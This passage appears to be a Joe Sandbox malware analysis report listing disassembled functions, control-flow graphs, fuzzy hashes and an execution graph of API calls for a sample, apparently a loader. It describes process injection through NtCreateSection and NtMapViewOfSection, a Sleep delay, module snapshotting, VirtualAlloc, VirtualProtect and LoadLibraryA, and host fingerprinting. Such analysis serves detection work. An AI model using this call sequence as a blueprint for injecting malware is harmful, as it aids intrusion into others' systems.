                                                            control_flow_graph 205 401620-40165a 212 40165d-401670 call 4012a9 205->212 213 40164e-401656 205->213 216 401672 212->216 217 401675-40167a 212->217 213->212 216->217 219 401680-401691 217->219 220 401991-401999 217->220 223 401697-4016c0 219->223 224 40198f-4019e0 call 4012a9 219->224 220->217 223->224 232 4016c6-4016dd NtDuplicateObject 223->232 232->224 233 4016e3-401707 NtCreateSection 232->233 236 401763-401789 NtCreateSection 233->236 237 401709-40172a NtMapViewOfSection 233->237 236->224 238 40178f-401793 236->238 237->236 240 40172c-401748 NtMapViewOfSection 237->240 238->224 241 401799-4017ba NtMapViewOfSection 238->241 240->236 242 40174a-401760 240->242 241->224 244 4017c0-4017dc NtMapViewOfSection 241->244 242->236 244->224 246 4017e2 call 4017e7 244->246
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                            • Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
                                                            • Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                            • Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24
                                                            Function 00401658 Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 251 401658-401670 call 4012a9 255 401672 251->255 256 401675-40167a 251->256 255->256 258 401680-401691 256->258 259 401991-401999 256->259 262 401697-4016c0 258->262 263 40198f-4019e0 call 4012a9 258->263 259->256 262->263 271 4016c6-4016dd NtDuplicateObject 262->271 271->263 272 4016e3-401707 NtCreateSection 271->272 275 401763-401789 NtCreateSection 272->275 276 401709-40172a NtMapViewOfSection 272->276 275->263 277 40178f-401793 275->277 276->275 279 40172c-401748 NtMapViewOfSection 276->279 277->263 280 401799-4017ba NtMapViewOfSection 277->280 279->275 281 40174a-401760 279->281 280->263 283 4017c0-4017dc NtMapViewOfSection 280->283 281->275 283->263 285 4017e2 call 4017e7 283->285
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                            • Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
                                                            • Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                            • Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24
                                                            Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 90sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 290 401a01-401a02 291 401a04-401a05 290->291 292 401a60 291->292 293 401a06-401a48 call 4012a9 Sleep call 401524 291->293 294 401a62 292->294 295 4019f8-401a0b 292->295 301 401a57-401a6f 293->301 326 401a4a-401a52 call 401615 293->326 298 401a53 294->298 299 401a64 294->299 295->291 298->301 303 401a66-401a6b 299->303 304 401ace-401b1c call 4012a9 299->304 308 401a72-401aa7 call 4012a9 301->308 317 401a65-401a6b 301->317 303->308 332 401b21 304->332 317->308 326->298 332->332
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                            • Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
                                                            • Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                            • Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B
                                                            Function 004019E3 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 333 4019e3-4019fc 335 4019f3 333->335 336 4019ff-401a0b 333->336 338 4019f8 335->338 340 401a60 336->340 341 401a06-401a48 call 4012a9 Sleep call 401524 336->341 338->336 340->338 342 401a62 340->342 347 401a57-401a6f 341->347 371 401a4a-401a52 call 401615 341->371 344 401a53 342->344 345 401a64 342->345 344->347 348 401a66-401a6b 345->348 349 401ace-401b1c call 4012a9 345->349 353 401a72-401aa7 call 4012a9 347->353 362 401a65-401a6b 347->362 348->353 377 401b21 349->377 362->353 371->344 377->377
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                            • Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
                                                            • Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                            • Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F
                                                            Function 004019EE Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 378 4019ee-4019f6 379 4019f8-401a0b 378->379 383 401a60 379->383 384 401a06-401a48 call 4012a9 Sleep call 401524 379->384 383->379 385 401a62 383->385 390 401a57-401a6f 384->390 414 401a4a-401a52 call 401615 384->414 387 401a53 385->387 388 401a64 385->388 387->390 391 401a66-401a6b 388->391 392 401ace-401b1c call 4012a9 388->392 396 401a72-401aa7 call 4012a9 390->396 405 401a65-401a6b 390->405 391->396 420 401b21 392->420 405->396 414->387 420->420
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                            • Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
                                                            • Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                            • Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B
                                                            Function 004019FA Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 421 4019fa-4019fc 423 4019f3 421->423 424 4019ff-401a0b 421->424 426 4019f8 423->426 428 401a60 424->428 429 401a06-401a48 call 4012a9 Sleep call 401524 424->429 426->424 428->426 430 401a62 428->430 435 401a57-401a6f 429->435 459 401a4a-401a52 call 401615 429->459 432 401a53 430->432 433 401a64 430->433 432->435 436 401a66-401a6b 433->436 437 401ace-401b1c call 4012a9 433->437 441 401a72-401aa7 call 4012a9 435->441 450 401a65-401a6b 435->450 436->441 465 401b21 437->465 450->441 459->432 465->465
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                            • Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
                                                            • Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                            • Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F
                                                            Function 00401A09 Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 466 401a09-401a48 call 4012a9 Sleep call 401524 475 401a57-401a6f 466->475 476 401a4a-401a53 call 401615 466->476 481 401a72-401aa7 call 4012a9 475->481 482 401a65-401a6b 475->482 476->475 482->481
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                            • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                            • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                            • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                            Function 00401A10 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 491 401a10-401a48 call 4012a9 Sleep call 401524 497 401a57-401a6f 491->497 498 401a4a-401a53 call 401615 491->498 503 401a72-401aa7 call 4012a9 497->503 504 401a65-401a6b 497->504 498->497 504->503
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                            • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                            • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                            • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B

                                                            Non-executed Functions

                                                            Function 00403406 Relevance: .2, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99842bcd4e4c2b5a8516caf28796ba06d235ef3a46b7b12f12a67ce8a4a221f0
                                                            • Instruction ID: 66069f82ada52bf1b0e7a715758aa27360240581fe00832f4dd048085fd6a7af
                                                            • Opcode Fuzzy Hash: 99842bcd4e4c2b5a8516caf28796ba06d235ef3a46b7b12f12a67ce8a4a221f0
                                                            • Instruction Fuzzy Hash: AE519AB492D2829EC713CF3488C09E5BF69EE6731130405EBD481AF6D3D6394A47C39A
                                                            Function 00402A9F Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: de3157a836501db8cf5431811897c06464d213d93ef77bce33c3680fcda06b18
                                                            • Instruction ID: 0bf335201b4081c8990773322d5bc76c700d8f7add6b30564506a2c4c32383c8
                                                            • Opcode Fuzzy Hash: de3157a836501db8cf5431811897c06464d213d93ef77bce33c3680fcda06b18
                                                            • Instruction Fuzzy Hash: 9FB0922878D4A24AC2229B2C84921B9FF22AE57324354859181C04B282E7A848A7D204

                                                            Execution Graph

                                                            Execution Coverage:8.2%
                                                            Dynamic/Decrypted Code Coverage:33.8%
                                                            Signature Coverage:11.1%
                                                            Total number of Nodes:314
                                                            Total number of Limit Nodes:12
                                                            execution_graph 21130 412e44 21131 412e4d 21130->21131 21132 412e57 21131->21132 21134 409960 21131->21134 21135 409975 21134->21135 21139 4099c7 21134->21139 21140 4336f0 21135->21140 21137 409a3b 21138 435440 RtlAllocateHeap 21137->21138 21138->21139 21139->21132 21141 43376b 21140->21141 21142 4337a8 RtlExpandEnvironmentStrings 21140->21142 21141->21142 21143 41b544 21144 41b552 21143->21144 21150 435440 21144->21150 21146 41b55c 21153 41bd00 21146->21153 21171 41f960 21146->21171 21147 41b5c6 21151 4354d0 RtlAllocateHeap 21150->21151 21152 43549d 21150->21152 21151->21146 21152->21151 21154 41bdc0 21153->21154 21155 41bd16 21153->21155 21154->21147 21155->21154 21156 435440 RtlAllocateHeap 21155->21156 21157 41be27 21156->21157 21157->21157 21175 43a060 21157->21175 21159 41beda 21159->21154 21161 435440 RtlAllocateHeap 21159->21161 21160 41be9d 21160->21154 21160->21159 21162 43a060 2 API calls 21160->21162 21163 41beea 21161->21163 21162->21159 21181 43a530 21163->21181 21165 41befc 21166 435440 RtlAllocateHeap 21165->21166 21167 41bf66 21165->21167 21169 41bf78 21166->21169 21167->21154 21188 4373e0 LdrInitializeThunk 21167->21188 21187 408f90 RtlAllocateHeap 21169->21187 21172 41fae0 21171->21172 21173 41f979 21171->21173 21172->21147 21174 435440 RtlAllocateHeap 21173->21174 21174->21172 21176 43a080 21175->21176 21177 435440 RtlAllocateHeap 21176->21177 21178 43a0b5 21177->21178 21179 43a1fe 21178->21179 21189 4373e0 LdrInitializeThunk 21178->21189 21179->21160 21183 43a575 21181->21183 21182 43a6ce 21182->21165 21184 43a5ee 21183->21184 21190 4373e0 LdrInitializeThunk 21183->21190 21184->21182 21191 4373e0 LdrInitializeThunk 21184->21191 21187->21167 21188->21154 21189->21179 21190->21184 21191->21182 21414 436d86 21417 436da7 21414->21417 21415 436e6f LoadLibraryW 21416 436e76 21415->21416 21417->21415 21417->21417 21418 414c84 21419 414cd0 21418->21419 21420 435440 RtlAllocateHeap 21419->21420 21421 414d2a 21420->21421 21421->21421 21422 43a060 2 API calls 21421->21422 21423 414d9e 21422->21423 21424 40d20b 21425 40d210 21424->21425 21426 435440 RtlAllocateHeap 21425->21426 21427 40d233 21426->21427 21192 41184c 21193 411855 21192->21193 21198 414ec0 21193->21198 21195 41186c 21196 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 21195->21196 21197 411876 21196->21197 21199 414ee0 21198->21199 21199->21199 21200 414eeb RtlExpandEnvironmentStrings 21199->21200 21201 414f08 21200->21201 21202 435440 RtlAllocateHeap 21201->21202 21203 414f18 RtlExpandEnvironmentStrings 21202->21203 21204 414fa1 21203->21204 21205 435440 RtlAllocateHeap 21204->21205 21206 415056 21205->21206 21206->21206 21207 43a060 2 API calls 21206->21207 21208 4150ca 21207->21208 21428 42880f 21429 428816 21428->21429 21430 4336f0 RtlExpandEnvironmentStrings 21429->21430 21431 4288ea 21430->21431 21432 428934 GetPhysicallyInstalledSystemMemory 21431->21432 21433 428959 21432->21433 21434 412c8c 21435 412c90 21434->21435 21435->21435 21436 435440 RtlAllocateHeap 21435->21436 21437 412cba 21436->21437 21209 43724d 21210 4372df RtlReAllocateHeap 21209->21210 21211 437295 21209->21211 21212 4373a0 21210->21212 21211->21210 21211->21211 21213 427353 21216 42735d 21213->21216 21214 427de0 GetComputerNameExA 21214->21216 21215 427efb GetComputerNameExA 21215->21216 21216->21214 21216->21215 21217 413ed3 21222 42ec90 21217->21222 21219 413ee0 21220 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 21219->21220 21221 413efc 21220->21221 21223 42ecc7 KiUserCallbackDispatcher GetSystemMetrics 21222->21223 21224 42ed10 DeleteObject 21223->21224 21226 42ed7e SelectObject 21224->21226 21228 42ee29 SelectObject 21226->21228 21229 42ee55 DeleteObject 21228->21229 21231 7bdfee 21232 7bdffd 21231->21232 21235 7be78e 21232->21235 21236 7be7a9 21235->21236 21237 7be7b2 CreateToolhelp32Snapshot 21236->21237 21238 7be7ce Module32First 21236->21238 21237->21236 21237->21238 21239 7be7dd 21238->21239 21240 7be006 21238->21240 21242 7be44d 21239->21242 21243 7be478 21242->21243 21244 7be489 VirtualAlloc 21243->21244 21245 7be4c1 21243->21245 21244->21245 21245->21245 21438 425e97 21439 425e63 21438->21439 21439->21438 21440 42605e 21439->21440 21442 4373e0 LdrInitializeThunk 21439->21442 21442->21440 21246 422ddb 21247 422df0 21246->21247 21247->21247 21248 435440 RtlAllocateHeap 21247->21248 21249 422ee2 21248->21249 21250 43a060 2 API calls 21249->21250 21251 422f8a 21250->21251 21448 412198 21449 4121a1 21448->21449 21454 417a30 21449->21454 21451 4121b9 21452 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 21451->21452 21453 4121c3 21452->21453 21455 417a50 21454->21455 21455->21455 21456 417a5b RtlExpandEnvironmentStrings 21455->21456 21457 417a78 21456->21457 21458 435440 RtlAllocateHeap 21457->21458 21459 417a88 RtlExpandEnvironmentStrings 21458->21459 21460 43a250 2 API calls 21459->21460 21461 417aa9 21460->21461 21252 4331d8 21254 433238 21252->21254 21253 4332c0 21254->21253 21256 4373e0 LdrInitializeThunk 21254->21256 21256->21253 21257 415cdd 21258 415cf1 21257->21258 21259 435440 RtlAllocateHeap 21258->21259 21261 415d30 21259->21261 21260 435440 RtlAllocateHeap 21262 415de3 21260->21262 21261->21260 21262->21262 21265 43a250 21262->21265 21264 415e51 21266 43a270 21265->21266 21267 435440 RtlAllocateHeap 21266->21267 21268 43a2a0 21267->21268 21269 43a3ce 21268->21269 21271 4373e0 LdrInitializeThunk 21268->21271 21269->21264 21271->21269 21472 414a9f 21473 435440 RtlAllocateHeap 21472->21473 21474 414aa7 21473->21474 21475 43a530 LdrInitializeThunk 21474->21475 21476 414abe 21475->21476 21477 408ea0 21480 408eab 21477->21480 21478 408eaf 21479 408f0b ExitProcess 21478->21479 21480->21478 21481 408ebc GetStdHandle GetConsoleWindow 21480->21481 21481->21478 21278 416460 21281 4174d0 21278->21281 21282 417599 21281->21282 21283 435440 RtlAllocateHeap 21282->21283 21284 417665 21283->21284 21285 435440 RtlAllocateHeap 21284->21285 21286 417862 21285->21286 21287 41ede3 21288 41edf3 21287->21288 21289 41ee02 21287->21289 21288->21289 21293 43a900 21288->21293 21297 43b050 RtlAllocateHeap LdrInitializeThunk 21289->21297 21292 41eeb7 21295 43a920 21293->21295 21294 43aa1e 21294->21289 21295->21294 21298 4373e0 LdrInitializeThunk 21295->21298 21297->21292 21298->21294 21482 433ca4 21483 43a060 2 API calls 21482->21483 21484 433cb9 21483->21484 21485 43a060 2 API calls 21484->21485 21486 433cfe 21485->21486 21299 214003c 21300 2140049 21299->21300 21301 214004c 21299->21301 21315 2140e0f SetErrorMode SetErrorMode 21301->21315 21306 2140265 21307 21402ce VirtualProtect 21306->21307 21309 214030b 21307->21309 21308 2140439 VirtualFree 21313 21405f4 LoadLibraryA 21308->21313 21314 21404be 21308->21314 21309->21308 21310 21404e3 LoadLibraryA 21310->21314 21312 21408c7 21313->21312 21314->21310 21314->21313 21316 2140223 21315->21316 21317 2140d90 21316->21317 21318 2140dad 21317->21318 21319 2140dbb GetPEB 21318->21319 21320 2140238 VirtualAlloc 21318->21320 21319->21320 21320->21306 21321 42b5e8 21322 42b6f6 21321->21322 21323 42b72c SysAllocString 21321->21323 21322->21323 21324 42b79e 21323->21324 21487 417b2d 21488 417b8b 21487->21488 21489 41a800 2 API calls 21488->21489 21490 417bcc 21489->21490 21325 4168ef 21326 416938 21325->21326 21327 435440 